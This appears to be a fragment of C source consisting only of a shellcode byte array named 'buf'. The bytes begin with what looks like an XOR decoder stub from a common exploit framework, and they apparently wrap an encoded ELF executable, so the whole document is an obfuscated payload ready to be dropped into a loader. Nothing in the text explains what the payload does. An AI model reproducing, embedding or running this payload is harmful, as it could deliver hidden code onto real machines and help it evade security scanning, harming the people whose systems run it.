unsigned char buf[] = 
"\x48\x31\xc9\x48\x81\xe9\x98\xff\xff\xff\x48\x8d\x05\xef"
"\xff\xff\xff\x48\xbb\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x48"
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x45\x53\x0f"
"\xd9\x84\xfc\x8c\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x3b"
"\x16\x7d\x9f\x87\xfd\x8d\x26\x3a\x16\x43\x9f\x86\xfd\x8d"
"\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x7a\x16\x43\x9f\x86"
"\xfd\x8d\x26\x3a\x16\x43\x9f\xc6\xfd\x8d\x26\x3a\x16\x03"
"\x9f\x81\xfd\x8e\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x3a"
"\x16\x43\x9f\x86\xfd\x8d\x26\x3a\x16\x43\x9f\x86\xfd\x8d"
"\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x3a\x16\x43\x9f\x86"
"\xfd\x8d\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x3a\x16\x43"
"\x9f\x86\xfd\x8d\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x3b"
"\x16\x43\x9f\x87\xfd\x8d\x26\x39\x16\x43\x9f\x86\xfd\x8d"
"\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x3a\x14\x43\x9f\x86"
"\xfd\x8d\x26\x3c\x16\x43\x9f\x86\xfd\x8d\x26\x3a\x16\x43"
"\x9f\x86\xfd\x8d\x26\x3e\x16\x43\x9f\x86\xfd\x8d\x26\x3a"
"\x16\x43\x9f\x86\xfd\x8d\x26\x3d\x16\x43\x9f\x87\xfd\x8d"
"\x26\x3c\x16\x43\x9f\x86\xfd\x8d\x26\x3a\x16\x43\x9f\x86"
"\xfd\x8d\x26\x2a\x14\x43\x9f\x86\xfd\x8d\x26\x2c\x16\x43"
"\x9f\x86\xfd\x8d\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x2a"
"\x16\x43\x9f\x86\xfd\x8d\x26\x3a\x16\x43\x9f\x86\xfd\x8d"
"\x26\x37\x16\x43\x9f\x85\xfd\x8d\x26\x3a\x16\x43\x9f\x86"
"\xfd\x8d\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x0a\x14\x43"
"\x9f\x86\xfd\x8d\x26\x08\x16\x43\x9f\x86\xfd\x8d\x26\x3a"
"\x16\x43\x9f\x86\xfd\x8d\x26\x3b\x16\x43\x9f\x86\xfd\x8d"
"\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x2d\x16\x43\x9f\x84"
"\xfd\x8d\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x3a\x16\x43"
"\x9f\x86\xfd\x8d\x26\x4a\x14\x43\x9f\x86\xfd\x8d\x26\xaa"
"\x16\x43\x9f\x86\xfd\x8d\x26\x3f\x16\x43\x9f\x83\xfd\x8d"
"\x26\x32\x16\x43\x9f\x86\xfd\x8d\x26\x22\x16\x43\x9f\x86"
"\xfd\x8d\x26\x25\x16\x43\x9f\x85\xfd\x8d\x26\x3a\x16\x43"
"\x9f\x86\xfd\x8d\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x3a"
"\x15\x43\x9f\x86\xfd\x8d\x26\x27\x16\x43\x9f\x86\xfd\x8d"
"\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x3b\x16\x43\x9f\x86"
"\xfd\x8d\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x1d\x16\x43"
"\x9f\x82\xfd\x8d\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x3a"
"\x16\x43\x9f\x86\xfd\x8d\x26\x1a\x15\x43\x9f\x86\xfd\x8d"
"\x26\x22\x16\x43\x9f\x86\xfd\x8d\x26\x3e\x16\x43\x9f\x84"
"\xfd\x8d\x26\x32\x16\x43\x9f\x86\xfd\x8d\x26\x22\x16\x43"
"\x9f\x86\xfd\x8d\x26\x5b\x65\x2e\xaf\xb7\xfd\x8d\x26\x3a"
"\x16\x43\x9f\x86\xfd\x8d\x26\x82\x1d\x43\x9f\x86\xb5\x36"
"\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x9c\x3a\x16\x43\x9f\x4b"
"\x7d\x8d\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x3a\x38\x27"
"\xfe\xf2\x9c\x8d\x08\x4e\x73\x3b\xeb\x86\xd3\xfe\x4e\x49"
"\x62\x31\xeb\xe7\x9f\x8d\x08\x49\x6f\x2e\xeb\xe7\x9f\x8d"
"\x08\x49\x62\x31\xeb\xe7\x9f\x8d\x08\x48\x73\x2f\xfe\xa8"
"\x89\xe8\x5e\x4e\x16\x43\x9f\x86\xfd\x8d\x26\x3a\x16\x43"
"\x9f\x86\xfd\x8d\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x3a"
"\x16\x43\x9f\x86\xfd\x8d\x26\x3a\x16\x43\x9f\x86\xfd\x8d"
"\x26\x3b\x16\x43\x9f\x82\xfd\x7c\xd9\x3a\x16\x43\x9f\x86"
"\xfd\x8d\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x3a\x16\x43"
"\x9f\x85\xfd\x8c\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x3a"
"\x16\x43\x9f\x86\xfd\x8d\x26\x3a\x16\x43\x9f\x85\xfd\x8f"
"\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x3a\x16\x43\x9f\x86"
"\xfd\x8d\x26\x28\x16\x43\x9f\x86\xfd\x8c\x26\x3a\x16\x43"
"\x9f\x86\xfd\x8d\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x2c"
"\x16\x43\x9f\x96\xfd\x8f\x26\x3a\x16\x43\x9f\x86\xfd\x8d"
"\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x3a\x38\x6d\xb0\xe7"
"\x8e\xe0\x10\x0e\x39\x22\xec\xeb\xcd\xb8\x08\x49\x16\x22"
"\xec\xeb\xfd\xd2\x55\x4e\x77\x31\xeb\x86\xfd\x8d\x26\x3d"
"\x16\x43\x9f\x86\xfd\x8d\x26\x3b\x16\x43\x9f\x84\xfd\x8d"
"\x26\x3a\x16\x43\x9f\x86\xfd\x8d\x26\x3a\x16\x43\x9f\x86"
"\xfd\x8d\x26";
